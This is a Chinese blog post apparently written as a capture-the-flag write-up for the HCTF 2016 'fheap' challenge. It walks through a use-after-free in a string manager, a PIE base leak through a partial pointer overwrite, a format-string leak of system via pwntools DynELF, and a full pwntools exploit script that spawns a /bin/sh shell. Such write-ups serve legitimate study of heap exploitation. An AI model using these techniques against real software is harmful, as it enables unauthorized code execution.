HCTF 2016 fheap

最新推荐文章于 2024-04-24 09:33:17 发布
最新推荐文章于 2024-04-24 09:33:17 发布
阅读量2k 收藏 4
点赞数 4
分类专栏: PWN类型之堆溢出 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/79515831
版权

HCTF 2016 fheap

一. 源码

fheap.c

二. 题目分析

1. 程序的生成

假设我们的源码文件名叫做fheap.c

gcc fheap.c -pie -fpic -o fheap
strip fheap

其中-fpic是辅助-pie, 没有-fpic将会编译失败.
strip是去除符号表(Discard symbols from object files)

结论: 平常PWN文件都可以正常调试,可是题目给我们的文件是无法调试的,加大了难度。
2. 程序的运行

运行之后,三个选项:

  1. create string
  2. delete string
  3. quit
  1. 选择create string, 输入size, content.
  2. 选择delete string, 输入id, 是否删除.
  3. 选择quit, 退出程序.

结论: 这是程序运行的简单介绍, 实际上就是一个字符串的管理程序。创建就是malloc, 删除free.

3. 程序分析

结构体:

typedef struct String{
    union {
        char *buf;          //输入的字符串大小>16, 地址付给buf
        char array[16];             //输入的字符串大小<16, 存放在array中
    } o;
    int len;
    void (*free)(struct String *ptr); //存放的free函数的地址, delete时使用
} String;

struct {
    int inuse;
    String *str;
} Strings[0x10];

1. create string

  1. 字符串块<16, 在原来的堆块上存放输入的字符串。
    result
  2. 字符串块>=16, malloc一个输入的字符串大小size的空间, 将该空间地址存放在原来的堆块中。
    result

2. delete string

关键代码:
    if (Strings[id].str) {
        printf("Are you sure?:");
        read(STDIN_FILENO,buf,0x100);
        if(strncmp(buf,"yes",3)) {
            return;
        }
        Strings[id].str->free(Strings[id].str);
        Strings[id].inuse = 0;
    }

存在double free漏洞: fastbin维护的chunk大小从32~128字节, 假定我们执行一下过程.

create(4, 'aa')  --> id = 0, 假定堆块地址: 0x5010;
create(4, 'bb')  --> id = 1, 假定堆块地址: 0x5040
delete(1)
delete(0)
create(0x18, 'a' * 0x18) --> id = 0;

注意: 最后一次create(0x18, 'a' * 0x18 ), malloc两个堆块, 分别为0x5010, 0x5040, 其中0x5040存放的是字符串内容. 0x5010存放着0x5040地址, 如下: .

0x5000:     0x0000000000000000      0x0000000000000031
0x5010:     0x0000000000005040      0x0000000000000000
0x5020:     0x0000000000000018      0x0000000000000d6c(freeShort)
0x5030:     0x0000000000000000      0x0000000000000031
0x5040:     0x6161616161616161      0x6161616161616161
0x5050:     0x6161616161616161      0x0000000000000d52(freeLong)

假如此时, 我们delete(1), 关键代码中的Strings[1].str ==> 0x6161616161616161, 为真. 就会执行0x5058的函数(freeLong).
由此, 我们可以有这样的设想: create(0x20, content), content中的内容可以覆盖1中的freeLong函数. delete(1), 就可以修改程序执行的流程.

4. 涉及的知识点:

fastbin的设计是为了快速的分配而准备的, 先进后出.
详见: https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/?spm=a313e.7916648.0.0.rJLhzh

4. 程序的调试

任何程序都不是一下子能写成功, 需要调试, 如何调试?

from pwn import *

p = process('./fheap')
......
gdb.attach(p)
......

执行过程中会弹出一个gdb的调试窗口, 这个窗口只和你写的Python脚本进行交互, 我们在Python脚本中写入发送的数据即可.

三. 思路总结

保护检查

result

总体思路: 泄露程序基地址, 找出system函数地址. 将free地址覆盖为system, 输入/bin/sh, 释放.

First Step : 泄露程序基地址

objdump -d fheap > fheap.txt

freeShort(offset): 0xd52
freeLong(offset): 0xd6c
d2d:    e8 5e fc ff ff          
callq  990 <puts@plt>

可以看出, 两个free函数与0xd2d只相差一个字节, 于是我们可以将free函数的最后一个字节修改为0x2d, 从而调用puts函数, 将字符串和callq 990这条指令的地址一块打印出来, 然后减去0xd2d, 就是整个程序加载的基地址.

泄露system函数地址

利用格式化字符串漏洞, 以及pwntools模块的DynELF来找出system函数地址.

def leak(addr):
    delete(0)
    data = 'aa%9$s' + '#' * (0x18 - len('aa%9$s')) + p64(print_plt)
    create(0x20, data)
    p.recvuntil("quit")
    p.send("delete ")
    p.recvuntil("id:")
    p.sendline(str(1))
    p.recvuntil('sure?:')
    p.send("yes0123" + p64(addr))
    p.recvuntil('aa')
    data = p.recvuntil("####")[:-4]
    data += "\x00"
    return data

最后一步

发送”/bin/sh”, 用system函数覆盖free函数.

payload = '/bin/sh\x00' + '#' * (0x18 - len('/bin/sh\x00')) + p64(system_addr)

EXP

from pwn import *
from ctypes import *

DEBUG = 1
# context(log_level='debug')
# context.log_level = 'debug'
if DEBUG:
     p = process('./fheap')
else:
     r = remote('172.16.4.93', 13025)

print_plt=0

def create(size,content):
    p.recvuntil("quit")
    p.send("create ")
    p.recvuntil("size:")
    p.sendline(str(size))
    p.recvuntil('str:')
    p.send(content.ljust(size,'\x00'))
    p.recvuntil('n')[:-1]

def delete(idx):
    p.recvuntil("quit")
    p.sendline("delete ")
    p.recvuntil('id:')
    p.send(str(idx)+'\n')
    p.recvuntil('sure?:')
    p.send('yes '+'\n')

def leak(addr):
    delete(0)
    data = 'aa%9$s' + '#'*(0x18 - len('aa%9$s')) + p64(print_plt)
    create(0x20, data)
    p.recvuntil("quit")
    p.send("delete ")
    p.recvuntil('id:')
    p.send(str(1) + '\n')
    p.recvuntil('sure?:')
    p.send('yes01234' + p64(addr))
    p.recvuntil('aa')
    data = p.recvuntil('####')[:-4]
    data += "\x00"
    return data

def pwn():
    global print_plt

    create(4,'aa')
    create(4,'bb')
    create(4,'cc')   
    delete(2)
    delete(1)
    delete(0)

    data='a' * 0x10 + 'b' * 0x8 + '\x2d' + '\x00'
    create(0x20, data)
    delete(1)
    p.recvuntil('b' * 0x8)
    data = p.recvline()[:-1]

    if len(data) > 8:
        data = data[:8]
    data=u64(data.ljust(8,'\x00'))
    proc_base = data - 0xd2d
    print "proc base", hex(proc_base)
    print_plt = proc_base + 0x9d0

    print "print plt", hex(print_plt)
    delete(0)


    #part2
    data='a' * 0x10 + 'b'*0x8 +'\x2D'+'\x00'
    create(0x20, data)
    gdb.attach(p)
    delete(1)
    p.recvuntil('b'*0x8)
    data = p.recvline()[:-1]
#    gdb.attach(p)
    d = DynELF(leak, proc_base, elf=ELF('./fheap'))
    system_addr = d.lookup('system', 'libc')
    print "system_addr:", hex(system_addr)

    #part3
    delete(0)
    data='/bin/sh;' + '#' * (0x18 - len('/bin/sh;')) + p64(system_addr)
    create(0x20, data)
    delete(1)
    p.interactive()

if __name__ == '__main__':
    pwn()

心得

这是我第一次接触堆方面的题, 说实话这个过程实在很苦.

  1. 网上找的相关文章, 水平参差不齐, EXP基本不能成功的GetShell.
  2. 调试方面的锅, 不能直接调试.
  3. 堆方面的知识太少, 还得练.

最后, 与君共勉, 加油!!!

相关链接:

  1. 逆向安全系列:Use After Free漏洞浅析 (EXP有效)
  2. fast-bin内存机制的利用探究 (调试新方法, 针对地址随机化)
  3. hctf2016 fheap学习(FreeBuf发表的官方解法) (知识点较全)
  4. HCTF开源Github
  5. 相关文件下载
qq_33528164
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
2016 hctf fheap 题解
abc380620175的博客
03-27 524
题目链接 https://github.com/zh-explorer/hctf2016-fheap 题目分析 题目功能只有 malloc 和 free 的功能,查看堆的布局: 全局指针没有置空,导致 uaf 和 double free 漏洞,两种都可以做,但是这题的重点是绕过 PIE。 double free 完了之后,会导致下面的情况 这里需要注意一下 create 函数的...
HCTF
weixin_30550081的博客
12-02 511
题目:魂斗罗 介绍:这个是HCTF里面的杂项,很好玩的, 1,这个看链接可以下载(http://139.224.54.27/gogogo/hundouluo.nes),然后在网上下载一个虚拟器(http://pan.baidu.com/share/link?shareid=3495699238&uk=1343756656)。 2,这个游戏你有两种玩法,第一种就是你自己凭本事过关,第二...
探秘 BSauce CTF:一个开源的网络安全竞技平台
最新发布
gitblog_00040的博客
04-24 367
探秘 BSauce CTF:一个开源的网络安全竞技平台 项目地址:https://gitcode.com/bsauce/CTF 项目简介 BSauce CTF 是一个基于 Web 的开放源代码平台,专为网络安全爱好者和专业人士打造,用于进行Capture The Flag(CTF)竞赛。CTF是一种网络安全比赛形式,参与者需要通过解谜、逆向工程、密码学等技能,解决一系列安全挑战,提升自己的信息安全...
hctf2016 fheap学习(FlappyPig队伍的解法)
weixin_30498807的博客
12-10 152
目录 漏洞原理 二次释放 如何在第二次释放前修改函数地址 fastbin的特性 修改函数指针流程 如何获得进程的加载基址 格式化字符串漏洞 确定printf函数在代码段中偏移 printf函数输出想要的地址 如何获得system函数的地址 寻找一个被fheap...
Using After Free
Grxer的博客
03-20 129
总之就是free后没有将指针置为null造成的,我们一般称被释放后没有被设置为 NULL 的内存指针为 dangling pointer。
兵者多诡(HCTF2016)
09-04 813
https://github.com/MartinxMax/CTFer_Zero_one
HCTF admin
weixin_45751765的博客
08-11 562
index0x00 初试0x01 复现a.unicode 欺骗b.flask session伪造c.条件竞争0x02 tips 0x00 初试 讲道理一开始摸到题以为是注入,目的也说了 以admin身份进入 然后尝试了手注和sqlmap结果啥都没有… 实在无奈开始观摩dl wp了 0x01 复现 a.unicode 欺骗 这也是最ez的一种吧… register->login->change_password 该界面在源码看到hint (所以说还是要养成看源码的好习惯呐)T^T down下
2014 HCTF Reverse400.rar
09-30
2014 HCTF Reverse400.rar
HCTF 2017 线下赛平台源码.zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料”...HCTF 2017 线下赛平台源码.zip
hctf2015-all-problems, hctf2015所有问题和来自作者的writeups.zip
09-18
hctf2015-all-problems, hctf2015所有问题和来自作者的writeups hctf2015-all-problemshctf2015所有问题和来自作者的writeups Writeups https://github.com/hduisa/hctf2015-all-problems/tree/master
一个实例讲解fastbins上的堆利用附件
09-06
我们将通过分析hctf 2016比赛中的一个挑战来深入探讨这个话题。 首先,`fastbins`是GNU libc的tcache(自2015年起引入)或之前版本的arena内存分配器中的一部分,它是一种优化小对象分配的机制。当调用`free`释放...
HCTF 2016 fheap 做题笔记
fa1c4的blog
08-21 494
前言 一道UAF题, HCTF 2016 - fheap ctfhub搜fheap 过程 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[1032]; // [rsp+0h] [rbp-410h] BYREF unsigned __int64 v5; // [rsp+408h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL); setbu
HCTF 2018 web 文件包含 超详解
ChamZhiZe的博客
10-13 312
HCTF 2018 web 文件包含 简单查看 右键在元素中发现了 source.php 也可以采用目录扫描的方式发现此php得到源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=
hctf2016_fheap
qq_53062301的博客
07-30 221
看的第二道堆题目,也调试和想了很久,学了很多东西,这道题也是一道uaf,从create函数中可以看到,如果申请的chunk>0xF就会申请两个chunk,其中一个是malloc(0x20),另一个是malloc(size),如果申请的chunk<0xF时,距离chunk头0x28的地方会存放着free函数的指针,可供用户自己输入的位置是距离chunk头0x10的位置,当delete时就会调用这个指针函数,题目本身也只有create和delete这两个可用功能,checksec发现题目开启了PIE
2016 hctf fheap
BadRer的博客
06-10 447
2016 hctf fheap 前言 好久没写东西了,本想着简单记录一下,不过在做这题的时候,弄懂了之前困扰许多的问题,所以就多写一些吧,在此感谢俺的女票@曙雀 UAF IDA分析后,得到数据结构如下。 note: 00000000 note struc ; (sizeof=0x20, mappedto_9) 00000000 content_ptr dq ? 00000008 field_8 dq ? 00000010 str_size dd ?
HCTF2016 兵者多诡
sinat_61654365的博客
02-20 477
题目路径发现题目只允许上传png格式并且限制大小,提交文件后url发生变化,抓包查看猜测存在upload与show相关.php文件,结合fp参数利用伪协议php试试访问flag相关文件不存在继续访问home,show,upload相关文件。
hctf2016-fheap
热门推荐
钞sir的博客
03-28 1万+
题目地址:https://github.com/zh-explorer/hctf2016-fheap 程序简介 程序中只有3个功能,一个create,一个delete然后一个quit: +++++++++++++++++++++++++++ So, let's crash the world +++++++++++++++++++++++++++ 1.create string 2.delete ...
hctf2016[pwn]-fheap
CharlesGodX的博客
03-30 1629
0x00:前言 这道题是一道堆栈混合加格式化字符串的题目,题目的利用点不错,很适合好好做一遍。 0x01:题目链接 https://github.com/zh-explorer/hctf2016-fheap 0x02:解题思路 首先查看程序保护 root@Thunder_J-virtual-machine:~/桌面# checksec pwn-f [*] Checking for new vers...
hctf2016-杂项签到
12-16
hctf2016-杂项签到是指在2016年举办的hctf比赛中,需要完成的杂项签到题目。这些题目通常是一些简单的密码或者编码类题目,旨在检测选手对常见密码学和编码知识的掌握程度。 比如,有可能会给出一串经过base64编码的字符串,选手需要解码这个字符串,得到隐藏在其中的信息。解码的方法可以通过在线工具或者编写简单的脚本来完成。 除了编码题目,还有可能会出现一些基本的算术题或者逻辑题。这些题目通常都包含了一些隐藏的规律或者提示,选手需要仔细观察题目,并运用自己的智力来解答。 在完成这些杂项签到题目的过程中,选手需要注重细节,避免遗漏任何可能的线索。同时,选手应该具备良好的团队合作能力,与队友相互协作,共同解决问题。 总的来说,hctf2016-杂项签到是一种考验选手在密码学、编码和逻辑思维等方面知识与实践能力的题目。通过完成这些题目,选手不仅可以提高自己的技术水平,还可以锻炼自己的团队合作和解决问题的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值